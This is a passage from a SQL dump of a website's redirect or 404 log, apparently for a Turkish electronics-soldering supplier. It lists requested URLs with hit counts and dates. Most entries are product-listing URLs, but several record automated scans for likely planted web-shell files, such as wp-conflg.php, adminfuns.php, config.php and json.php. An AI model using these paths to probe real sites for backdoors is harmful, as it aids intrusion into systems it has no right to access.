00:00:00',301),(37425,'http://3s-technologies.com.tr/tr/wp-includes/widgets/wp-conflg.php',NULL,'','',1,0,'2025-02-21 00:59:01','0000-00-00 00:00:00',301),(37426,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/wp-conflg.php',NULL,'','',26,0,'2025-02-21 00:59:04','0000-00-00 00:00:00',301),(37427,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/wp-conflg.php',NULL,'','',1,0,'2025-02-21 00:59:05','0000-00-00 00:00:00',301),(37428,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/wp-conflg.php',NULL,'','',1,0,'2025-02-21 00:59:06','0000-00-00 00:00:00',301),(37429,'http://3s-technologies.com.tr/tr/wp-includes/assets/wp-conflg.php',NULL,'','',1,0,'2025-02-21 00:59:08','0000-00-00 00:00:00',301),(37430,'http://3s-technologies.com.tr/tr/wp-content/uploads/wp-conflg.php',NULL,'','',64,0,'2025-02-21 00:59:09','0000-00-00 00:00:00',301),(37431,'http://3s-technologies.com.tr/tr/wp-includes/html-api/wp-conflg.php',NULL,'','',56,0,'2025-02-21 00:59:11','0000-00-00 00:00:00',301),(37432,'http://3s-technologies.com.tr/tr/wp-includes/random_compat/wp-conflg.php',NULL,'','',1,0,'2025-02-21 00:59:13','0000-00-00 00:00:00',301),(37433,'http://3s-technologies.com.tr/tr/wp-includes/requests/wp-conflg.php',NULL,'','',2,0,'2025-02-21 00:59:15','0000-00-00 00:00:00',301),(37434,'http://3s-technologies.com.tr/tr/wp-includes/pomo/wp-conflg.php',NULL,'','',17,0,'2025-02-21 00:59:17','0000-00-00 00:00:00',301),(37435,'https://www.3s-technologies.com.tr/en/?itemid=243',NULL,'','',2,0,'2025-02-21 09:03:31','0000-00-00 00:00:00',301),(37436,'https://www.3s-technologies.com.tr/en/?itemid=429',NULL,'','',2,0,'2025-02-21 09:03:37','0000-00-00 00:00:00',301),(37437,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/js',NULL,'','',1,0,'2025-02-21 10:02:09','0000-00-00 00:00:00',301),(37438,'http://3s-technologies.com.tr/tr/wp-content/uploads/json.php',NULL,'','',61,0,'2025-02-21 16:59:36','0000-00-00 00:00:00',301),(37439,'http://3s-technologies.com.tr/tr/wp-content/themes/freeyanz/config.php',NULL,'','',3,0,'2025-02-21 16:59:37','0000-00-00 00:00:00',301),(37440,'http://3s-technologies.com.tr/tr/wp-content/themes/erapress/config.php',NULL,'','',3,0,'2025-02-21 16:59:38','0000-00-00 00:00:00',301),(37441,'http://3s-technologies.com.tr/tr/wp-content/plugins/doyanz/config.php',NULL,'','',3,0,'2025-02-21 16:59:52','0000-00-00 00:00:00',301),(37442,'http://3s-technologies.com.tr/tr/wp-content/themes/panama/json.php',NULL,'','',3,0,'2025-02-21 16:59:54','0000-00-00 00:00:00',301),(37443,'http://3s-technologies.com.tr/tr/wp-content/themes/moog/config.php',NULL,'','',3,0,'2025-02-21 16:59:57','0000-00-00 00:00:00',301),(37444,'http://3s-technologies.com.tr/tr/wp-content/uploads/2023/11/config.php',NULL,'','',3,0,'2025-02-21 16:59:58','0000-00-00 00:00:00',301),(37445,'http://3s-technologies.com.tr/tr/wp-content/uploads/2023/12/config.php',NULL,'','',3,0,'2025-02-21 17:00:00','0000-00-00 00:00:00',301),(37446,'http://3s-technologies.com.tr/tr/wp-content/themes/blogai/issue.php',NULL,'','',3,0,'2025-02-21 17:00:03','0000-00-00 00:00:00',301),(37447,'http://3s-technologies.com.tr/tr/wp-content/themes/agwin/config.php',NULL,'','',3,0,'2025-02-21 17:00:05','0000-00-00 00:00:00',301),(37448,'http://3s-technologies.com.tr/tr/wp-content/themes/quext/config.php',NULL,'','',3,0,'2025-02-21 17:00:07','0000-00-00 00:00:00',301),(37449,'http://3s-technologies.com.tr/tr/wp-content/plugins/app-calendar/config.php',NULL,'','',3,0,'2025-02-21 17:00:11','0000-00-00 00:00:00',301),(37450,'http://3s-technologies.com.tr/en/thoms.php',NULL,'www.google.com','',9,0,'2025-02-22 11:35:30','0000-00-00 00:00:00',301),(37451,'http://3s-technologies.com.tr/en/userfuns.php',NULL,'www.google.com','',8,0,'2025-02-22 11:35:38','0000-00-00 00:00:00',301),(37452,'http://3s-technologies.com.tr/en/tempfuns.php',NULL,'www.google.com','',8,0,'2025-02-22 11:35:41','0000-00-00 00:00:00',301),(37453,'http://3s-technologies.com.tr/en/termps.php',NULL,'www.google.com','',27,0,'2025-02-22 11:35:43','0000-00-00 00:00:00',301),(37454,'http://3s-technologies.com.tr/en/classfuns.php',NULL,'www.google.com','',9,0,'2025-02-22 11:35:46','0000-00-00 00:00:00',301),(37455,'https://3s-technologies.com.tr/en/wp-content/plugins/seoplugins/db.php?u',NULL,'www.google.com','',3,0,'2025-02-24 23:15:03','0000-00-00 00:00:00',301),(37456,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/by,category_name?language=tr-tr',NULL,'','',1,0,'2025-02-25 14:59:19','0000-00-00 00:00:00',301),(37457,'https://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/dirdesc',NULL,'','',12,0,'2025-02-26 13:36:13','0000-00-00 00:00:00',301),(37458,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/am100-detail/askquestion?tmpl=component',NULL,'','',8,0,'2025-02-26 13:36:15','0000-00-00 00:00:00',301),(37459,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',14,0,'2025-02-26 13:36:16','0000-00-00 00:00:00',301),(37460,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',14,0,'2025-02-26 13:36:17','0000-00-00 00:00:00',301),(37461,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,category_name',NULL,'','',19,0,'2025-02-26 13:36:20','0000-00-00 00:00:00',301),(37462,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',14,0,'2025-02-26 13:36:21','0000-00-00 00:00:00',301),(37463,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,mf_name',NULL,'','',17,0,'2025-02-26 13:36:24','0000-00-00 00:00:00',301),(37464,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',17,0,'2025-02-26 13:36:25','0000-00-00 00:00:00',301),(37465,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,ordering',NULL,'','',15,0,'2025-02-26 13:36:28','0000-00-00 00:00:00',301),(37466,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,product_name',NULL,'','',15,0,'2025-02-26 13:36:30','0000-00-00 00:00:00',301),(37467,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',15,0,'2025-02-26 13:36:31','0000-00-00 00:00:00',301),(37468,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,product_sku',NULL,'','',12,0,'2025-02-26 13:36:34','0000-00-00 00:00:00',301),(37469,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/dirdesc',NULL,'','',15,0,'2025-02-26 13:36:36','0000-00-00 00:00:00',301),(37470,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/mx200lp-detail/askquestion?tmpl=component',NULL,'','',5,0,'2025-02-26 13:36:39','0000-00-00 00:00:00',301),(37471,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,`p`.product_sku',NULL,'','',13,0,'2025-02-26 13:36:42','0000-00-00 00:00:00',301),(37472,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',12,0,'2025-02-26 13:36:43','0000-00-00 00:00:00',301),(37473,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,category_name',NULL,'','',15,0,'2025-02-26 13:36:46','0000-00-00 00:00:00',301),(37474,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',13,0,'2025-02-26 13:36:47','0000-00-00 00:00:00',301),(37475,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,mf_name',NULL,'','',16,0,'2025-02-26 13:36:50','0000-00-00 00:00:00',301),(37476,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',16,0,'2025-02-26 13:36:51','0000-00-00 00:00:00',301),(37477,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,ordering?language=tr-tr',NULL,'','',1,0,'2025-02-26 13:36:54','0000-00-00 00:00:00',301),(37478,'http://3s-technologies.com.tr/en/adminfuns.php',NULL,'www.google.com','',185,0,'2025-02-27 01:18:04','0000-00-00 00:00:00',301),(37479,'http://3s-technologies.com.tr/en/wp-content/hplfuns.php',NULL,'www.google.com','',5,0,'2025-02-27 01:18:43','0000-00-00 00:00:00',301),(37480,'http://3s-technologies.com.tr/en/wp-content/termps.php',NULL,'www.google.com','',5,0,'2025-02-27 01:18:50','0000-00-00 00:00:00',301),(37481,'http://3s-technologies.com.tr/en/connects.php',NULL,'www.google.com','',6,0,'2025-02-27 01:19:12','0000-00-00 00:00:00',301),(37482,'http://3s-technologies.com.tr/en/hplfuns.php',NULL,'www.google.com','',26,0,'2025-02-27 01:19:19','0000-00-00 00:00:00',301),(37483,'http://3s-technologies.com.tr/en/filefuns.php',NULL,'www.google.com','',4,0,'2025-02-27 01:19:26','0000-00-00 00:00:00',301),(37484,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&itemid=62&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=en','',1,0,'2025-02-27 13:46:11','0000-00-00 00:00:00',301),(37485,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&itemid=37&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=en','',1,0,'2025-02-27 13:58:42','0000-00-00 00:00:00',301),(37486,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&itemid=100&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100&lang=en','',1,0,'2025-02-27 14:00:37','0000-00-00 00:00:00',301),(37487,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&itemid=134&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=en','',1,0,'2025-02-27 14:04:26','0000-00-00 00:00:00',301),(37488,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&itemid=58&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=en','',1,0,'2025-02-27 14:05:35','0000-00-00 00:00:00',301),(37489,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&itemid=114&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=en','',1,0,'2025-02-27 14:08:45','0000-00-00 00:00:00',301),(37490,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&itemid=28&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=en','',1,0,'2025-02-27 14:26:00','0000-00-00 00:00:00',301),(37491,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&itemid=149&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149&lang=en','',1,0,'2025-02-27 14:46:10','0000-00-00 00:00:00',301),(37492,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&itemid=110&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=en','',1,0,'2025-02-27 14:46:32','0000-00-00 00:00:00',301),(37493,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&itemid=57&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57&lang=en','',1,0,'2025-02-27 14:51:53','0000-00-00 00:00:00',301),(37494,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&itemid=50&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en','',1,0,'2025-02-27 14:58:07','0000-00-00 00:00:00',301),(37495,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&itemid=131&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=en','',1,0,'2025-02-27 15:03:30','0000-00-00 00:00:00',301),(37496,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&itemid=92&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=en','',1,0,'2025-02-27 15:12:47','0000-00-00 00:00:00',301),(37497,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=45&itemid=29&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=45&Itemid=29&lang=en','',1,0,'2025-02-27 15:22:55','0000-00-00 00:00:00',301),(37498,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&itemid=155&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=en','',1,0,'2025-02-27 15:27:06','0000-00-00 00:00:00',301),(37499,'http://www.3s-technologies.com.tr/joomla/index.php?limitstart=5&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?limitstart=5&lang=en','',1,0,'2025-02-27 15:36:01','0000-00-00 00:00:00',301),(37500,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&itemid=133&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=en','',1,0,'2025-02-27 15:36:30','0000-00-00 00:00:00',301),(37501,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=82&itemid=38&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=82&Itemid=38&lang=en','',1,0,'2025-02-27 15:41:32','0000-00-00 00:00:00',301),(37502,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&itemid=61&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=en','',1,0,'2025-02-27 15:49:21','0000-00-00 00:00:00',301),(37503,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&itemid=2&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=en','',1,0,'2025-02-27 15:53:33','0000-00-00 00:00:00',301),(37504,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&itemid=55&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=en','',1,0,'2025-02-27 16:06:51','0000-00-00 00:00:00',301),(37505,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&itemid=60&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en','',1,0,'2025-02-27 16:12:04','0000-00-00 00:00:00',301),(37506,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&itemid=27&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=en','',1,0,'2025-02-27 16:14:19','0000-00-00 00:00:00',301),(37507,'https://3s-technologies.com.tr/tr/phpunit.xml',NULL,'','',1,0,'2025-03-01 08:14:13','0000-00-00 00:00:00',301),(37508,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc',NULL,'','',20,0,'2025-03-01 13:51:07','0000-00-00 00:00:00',301),(37509,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',22,0,'2025-03-01 13:51:08','0000-00-00 00:00:00',301),(37510,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-03-01 13:51:10','0000-00-00 00:00:00',301),(37511,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name',NULL,'','',21,0,'2025-03-01 13:51:11','0000-00-00 00:00:00',301),(37512,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-03-01 13:51:12','0000-00-00 00:00:00',301),(37513,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name',NULL,'','',21,0,'2025-03-01 13:51:14','0000-00-00 00:00:00',301),(37514,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name?language=en-gb',NULL,'','',1,0,'2025-03-01 13:51:15','0000-00-00 00:00:00',301),(37515,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-03-01 13:51:16','0000-00-00 00:00:00',301),(37516,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_sku',NULL,'','',20,0,'2025-03-01 13:53:48','0000-00-00 00:00:00',301),(37517,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/dirdesc?language=en-gb',NULL,'','',2,0,'2025-03-01 13:53:49','0000-00-00 00:00:00',301),(37518,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı?language=en-gb',NULL,'','',2,0,'2025-03-01 13:53:50','0000-00-00 00:00:00',301),(37519,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız',NULL,'','',16,0,'2025-03-01 13:53:51','0000-00-00 00:00:00',301),(37520,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku',NULL,'','',17,0,'2025-03-01 13:53:52','0000-00-00 00:00:00',301),(37521,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,ordering',NULL,'','',22,0,'2025-03-01 13:53:53','0000-00-00 00:00:00',301),(37522,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name',NULL,'','',24,0,'2025-03-01 13:53:55','0000-00-00 00:00:00',301),(37523,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',22,0,'2025-03-01 13:53:56','0000-00-00 00:00:00',301),(37524,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_sku',NULL,'','',17,0,'2025-03-01 13:53:59','0000-00-00 00:00:00',301),(37525,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/dirdesc',NULL,'','',17,0,'2025-03-01 13:54:01','0000-00-00 00:00:00',301),(37526,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku',NULL,'','',11,0,'2025-03-01 13:54:04','0000-00-00 00:00:00',301),(37527,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',10,0,'2025-03-01 13:54:05','0000-00-00 00:00:00',301),(37528,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-03-01 13:54:06','0000-00-00 00:00:00',301),(37529,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc',NULL,'','',12,0,'2025-03-01 13:54:07','0000-00-00 00:00:00',301),(37530,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_name/dirdesc',NULL,'','',13,0,'2025-03-01 13:54:09','0000-00-00 00:00:00',301),(37531,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-03-01 13:54:10','0000-00-00 00:00:00',301),(37532,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,ordering?language=tr-tr',NULL,'','',1,0,'2025-03-01 13:54:11','0000-00-00 00:00:00',301),(37533,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_name',NULL,'','',15,0,'2025-03-01 13:54:12','0000-00-00 00:00:00',301),(37534,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_name/dirdesc',NULL,'','',16,0,'2025-03-01 13:54:13','0000-00-00 00:00:00',301),(37535,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/cs40-detail/askquestion?tmpl=component',NULL,'','',6,0,'2025-03-01 13:54:14','0000-00-00 00:00:00',301),(37536,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,`p`.product_sku',NULL,'','',14,0,'2025-03-01 13:54:17','0000-00-00 00:00:00',301),(37537,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',13,0,'2025-03-01 13:54:18','0000-00-00 00:00:00',301),(37538,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,mf_name',NULL,'','',13,0,'2025-03-01 13:54:21','0000-00-00 00:00:00',301),(37539,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,mf_name/dirdesc',NULL,'','',15,0,'2025-03-01 13:54:22','0000-00-00 00:00:00',301),(37540,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,ordering',NULL,'','',13,0,'2025-03-01 13:54:25','0000-00-00 00:00:00',301),(37541,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,product_name',NULL,'','',13,0,'2025-03-01 13:54:27','0000-00-00 00:00:00',301),(37542,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,product_name/dirdesc',NULL,'','',11,0,'2025-03-01 13:54:29','0000-00-00 00:00:00',301),(37543,'https://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,category_name',NULL,'','',19,0,'2025-03-01 14:09:27','0000-00-00 00:00:00',301),(37544,'https://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,category_name/dirdesc',NULL,'','',20,0,'2025-03-01 14:09:28','0000-00-00 00:00:00',301),(37545,'https://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,mf_name',NULL,'','',16,0,'2025-03-01 14:09:31','0000-00-00 00:00:00',301),(37546,'https://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',17,0,'2025-03-01 14:09:32','0000-00-00 00:00:00',301),(37547,'https://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,ordering',NULL,'','',15,0,'2025-03-01 14:09:35','0000-00-00 00:00:00',301),(37548,'https://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,product_name',NULL,'','',21,0,'2025-03-01 14:09:37','0000-00-00 00:00:00',301),(37549,'https://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,product_name/dirdesc',NULL,'','',20,0,'2025-03-01 14:09:38','0000-00-00 00:00:00',301),(37550,'https://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,product_sku',NULL,'','',22,0,'2025-03-01 14:09:41','0000-00-00 00:00:00',301),(37551,'https://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/dirdesc',NULL,'','',21,0,'2025-03-01 14:09:43','0000-00-00 00:00:00',301),(37552,'https://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',8,0,'2025-03-01 14:09:44','0000-00-00 00:00:00',301),(37553,'https://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/e-bar-detail',NULL,'','',8,0,'2025-03-01 14:09:45','0000-00-00 00:00:00',301),(37554,'https://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',8,0,'2025-03-01 14:09:46','0000-00-00 00:00:00',301),(37555,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,`p`.product_sku',NULL,'','',17,0,'2025-03-01 14:09:53','0000-00-00 00:00:00',301),(37556,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',17,0,'2025-03-01 14:09:54','0000-00-00 00:00:00',301),(37557,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,category_name',NULL,'','',21,0,'2025-03-01 14:09:57','0000-00-00 00:00:00',301),(37558,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,category_name/dirdesc',NULL,'','',18,0,'2025-03-01 14:09:58','0000-00-00 00:00:00',301),(37559,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',14,0,'2025-03-01 14:10:04','0000-00-00 00:00:00',301),(37560,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',14,0,'2025-03-01 14:10:06','0000-00-00 00:00:00',301),(37561,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeldri/çubuk-lehim',NULL,'','',8,0,'2025-03-01 14:10:08','0000-00-00 00:00:00',301),(37562,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku',NULL,'','',27,0,'2025-03-01 14:10:10','0000-00-00 00:00:00',301),(37563,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',27,0,'2025-03-01 14:10:11','0000-00-00 00:00:00',301),(37564,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name',NULL,'','',29,0,'2025-03-01 14:10:13','0000-00-00 00:00:00',301),(37565,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',30,0,'2025-03-01 14:10:14','0000-00-00 00:00:00',301),(37566,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,ordering',NULL,'','',26,0,'2025-03-01 14:10:17','0000-00-00 00:00:00',301),(37567,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,category_name?language=tr-tr',NULL,'','',1,0,'2025-03-01 14:10:18','0000-00-00 00:00:00',301),(37568,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-03-01 14:10:19','0000-00-00 00:00:00',301),(37569,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı',NULL,'','',21,0,'2025-03-01 14:10:21','0000-00-00 00:00:00',301),(37570,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',24,0,'2025-03-01 14:10:22','0000-00-00 00:00:00',301),(37571,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',25,0,'2025-03-01 14:10:23','0000-00-00 00:00:00',301),(37572,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,mf_name',NULL,'','',20,0,'2025-03-01 14:10:25','0000-00-00 00:00:00',301),(37573,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',25,0,'2025-03-01 14:10:26','0000-00-00 00:00:00',301),(37574,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,category_name',NULL,'','',19,0,'2025-03-01 14:10:28','0000-00-00 00:00:00',301),(37575,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',17,0,'2025-03-01 14:10:29','0000-00-00 00:00:00',301),(37576,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name',NULL,'','',21,0,'2025-03-01 14:10:32','0000-00-00 